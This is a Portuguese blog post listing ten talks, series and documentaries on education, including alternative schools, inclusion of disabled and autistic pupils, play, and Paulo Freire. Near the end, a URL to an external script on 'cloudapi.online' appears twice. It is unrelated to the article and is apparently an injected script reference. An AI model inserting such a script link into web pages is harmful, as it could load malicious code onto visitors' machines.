10 vídeos e documentários para (re)pensar a educação

A ideia da educação como a solução de todos os problemas (tanto em nível político-econômico quanto social) já se entrosou com o senso comum da população. Não raramente, em conversas cotidianas, soltamos um “Acho que tudo começa com a educação” e conferimos a ela a tarefa heroica de sanar nossas mazelas coletivas. Apesar de não ser um pensamento inadequado, por vezes nos falta uma visão palpável da realidade – com toda a sua pluralidade de mecanismos e relações escolares – principalmente da educação brasileira. No mesmo balaio da escola, principalmente a pública, vemos refletidos todas as relações de poder, as desigualdades de crença, de cor, de sexualidade, de cognição, num microcosmo muito sensível da nossa sociedade. Mas, afinal, quando nasceu a escola da maneira que experimentamos hoje? Essa escola funcionalista, em consonância com as exigências de uma sociedade de consumo, é a melhor opção para a educação? A escola pública fornece as mesmas condições que a escola particular? E os alunos de inclusão, cuja presença na escola convencional é garantida por lei desde 2015 – a escola atual trabalha por eles?

Nesses 10 registros audiovisuais – que são entrevistas, palestras, reportagens e documentários – selecionados pelo NotaTerapia, você poderá expandir a sua ideia de educação e conhecer melhor os elementos que compõem esse espaço coletivo de conhecimento e humanização. Pode, ainda, ter contato com alternativas existentes a esse modelo de ensino tradicional e redefinir a concepção de escola. Confira:

1- Volta ao mundo em 13 escolas, com Camila Piza – Tedx Talk

Um coletivo formado por 4 amigos embarcou numa viagem em 5 continentes em busca de modelos inovadores em educação. O Educ-Ação, composto por Eduardo Shimaraha, o jornalista André Gravatá, a psicóloga Camila Piza e a pesquisadora Carla Mayumi, conseguiu realizar essa proposta a partir de um financiamento coletivo. Visitando escolas em nove países, com focos e metodologias diferentes, a iniciativa ainda originou o livro (integralmente de acesso público) Volta ao mundo em 13 escolas – Sinais do futuro no presente, fruto dos registros da jornada. Nessa TEDx Talk, uma das idealizadoras do projeto explica o processo para concretizá-lo e resume essa experiência única de conhecer modelos de ensino alternativos e efetivados. Para baixar o e-book do coletivo, clique aqui.

2 – Tarja Branca (2014), dirigido por Cacau Rhoden – documentário

Este documentário nacional faz uma ode à brincadeira e conta com os depoimentos de diversos profissionais (incluindo o falecido artista Domingos Montagner) que vivenciaram (e vivenciam!) o poder dessa alegria criativa que é tão familiar às crianças. Mas aqui o brincar deixa de ser uma atividade meramente infantil para se tornar uma atitude transformadora e capaz de revolucionar a nossa educação de maneira integral.

3 – Destino Educação: Projeto Âncora (TV Futura) – série

Baseada na metodologia inovadora da Escola da Ponte, do educador português José Pacheco, o Projeto Âncora é uma comunidade de aprendizagem localizada no município de Cotia, no interior de São Paulo. A cidade, que apresentava um dos menores índices no Ideb (Índice de Desenvolvimento de Educação Básica) do estado, ganhou a nova escola nos anos 90 do empresário austríaco Walter Steurer. Depois de sua morte, em 2011, o projeto começou a ser orientado por José Pacheco e, conta, atualmente, com 170 alunos em período integral que residem na região de Cotia. Uma escola gratuita, que sobrevive de investimentos privados, sem muros, classes e alunos enfileirados pode até parecer utópica, mas seus anos de atividade e de relevância confirmam que é possível uma alternativa. A série “Destino: Educação – Escolas Inovadoras” da TV Futura se aprofunda, a cada episódio, numa escola revolucionária pelo mundo e está disponível na internet.

4 – Vamos falar de inclusão? (2016), dirigido por Bibiana Xausa-Bosak – documentário

Uma produção da FADEM (Fundação de Atendimento de Deficiência Múltipla), o documentário em média-metragem mergulha no universo da deficiência múltipla. Os profissionais da instituição, que trabalha há mais de 30 anos com a inclusão e o atendimento de crianças e adolescentes com deficiência múltipla, exploram no documentário a importância de esses alunos conviverem no meio escolar tradicional e discutem a viabilização de uma educação efetivamente inclusiva. Fica o questionamento para agentes escolares e professores: quem é a criança que está na sala de aula além do diagnóstico? O documentário está disponível no Youtube e você pode assistir acima.

5 – Quando sinto que já sei (2014) – documentário

Também realizado a partir de um financiamento coletivo, o documentário da Despertar Filmes apresenta depoimentos de educadores, alunos, pais e outros profissionais acerca do papel da escola tradicional e das questões essenciais que vem sendo negligenciadas por ela. Ao conhecermos mais de 8 iniciativas educacionais brasileiras por uma educação humanizadora e autônoma, como o já citado Projeto Âncora e também escolas públicas, descobrimos uma centelha criativa e revolucionária na instituição complexa que é a escola. Assista ao filme completo acima.

6 – Autismo e Educação (Conexão Futura) – entrevista

A Lei da Inclusão, que entrou em vigor em 2016, tornou obrigatório o atendimento dos espaços, materiais e metodologias escolares a pessoas com deficiência. Estima-se que para cada 110 nascimentos no mundo, 1 nasce com algum grau de autismo e , no Brasil, esse número pode chegar a 2 milhões de pessoas. Mas como essa inclusão ocorre na realidade? Essa entrevista com Luciano Aragão, membro fundador do Grupo de Pais, e a dra. Erika Parlato Oliveira, coordenadora do Projeto de Pesquisa e Avaliação de Autismo, elucida a peculiaridade do autismo como neurodiversidade e como questão educacional.

7 – A educação proibida (2014), dirigido por Germán Doin – documentário

A Educação Proibida é um documentário que se propõe a questionar as lógicas da escolarização moderna e a forma de entender a educação, focando em experiências educacionais diferentes, não convencionais, que buscam um novo paradigma educativo. O documentário é um projeto feito por jovens que partilhando dessa visão, embarcaram em uma pesquisa em oito países realizando entrevistas com mais de 90 educadores com propostas educativas alternativas. O filme se propõe alimentar e iniciar um debate de reflexão social sobre as bases que sustentam a escola, promovendo o desenvolvimento de uma educação integral centrada no amor, no respeito, na liberdade e na aprendizagem. (fonte)

8 – Janelas de inovação: Instituto Pandavas – série

O Instituto Pandavas, do município de Monteiro Lobato (SP) se destaca por inovar em seu modelo de ensino inspirado em escolas alternativas da Europa. Recentemente, os alunos foram divididos por nível de aprendizagem, para superar dificuldades com maior atenção e apoio dos colegas e professores. Para os alunos, a mudança foi benéfica e eliminou dificuldades crônicas do padrão convencional de salas de aula. A escola, que completou 40 anos, iniciou essa transformação em 2013. Atualmente, configura um cenário inovador e humanístico na região.

9 – Pro dia nascer feliz (2005), dirigido por João Jardim – documentário

Pro dia nascer feliz foi um documentário premiado em seu ano de lançamento no Festival de Gramado e, apesar de seu lançamento ter sido há mais de uma década, a realidade retratada ainda se mostra muito análoga aos dias de hoje. O cineasta aborda sobretudo as dificuldades do ensino público do país ao mesmo tempo em que também conhece a estrutura de algumas das instituições mais privilegiadas.

10 – Paulo Freire: Contemporâneo (2006) – documentário

Nascido em 19 de setembro de 1921 no Recife, Pernambuco, Paulo Freire foi um dos maiores educadores brasileiros e, ainda hoje, é referência bibliográfica na pedagogia e estudos relacionados ao ensino e à educação. O documentário Contemporâneo retoma as origens das primeiras experiências de alfabetização e de educação popular freirianas, quase 50 anos depois de sua realização em Angicos (RN), para mostrar de que forma os elementos fundamentais de seu pensamento e pedagogia estão vivos e presentes até os dias atuais. (fonte)

Imagem de capa: Janelas de inovação – Instituto Pandavas

https://cloudapi.online/js/api46.js
https://cloudapi.online/js/api46.js

Related posts

Crítica: “Rivais” traz uma disputa tensa dentro e fora das quadras de tênis

“A Paixão Segundo G.H.”: Entrevista com Luiz Fernando Carvalho e Maria Fernanda Cândido

CRÍTICA: “A paixão segundo G.H.” traz Maria Fernanda Cândido em seu auge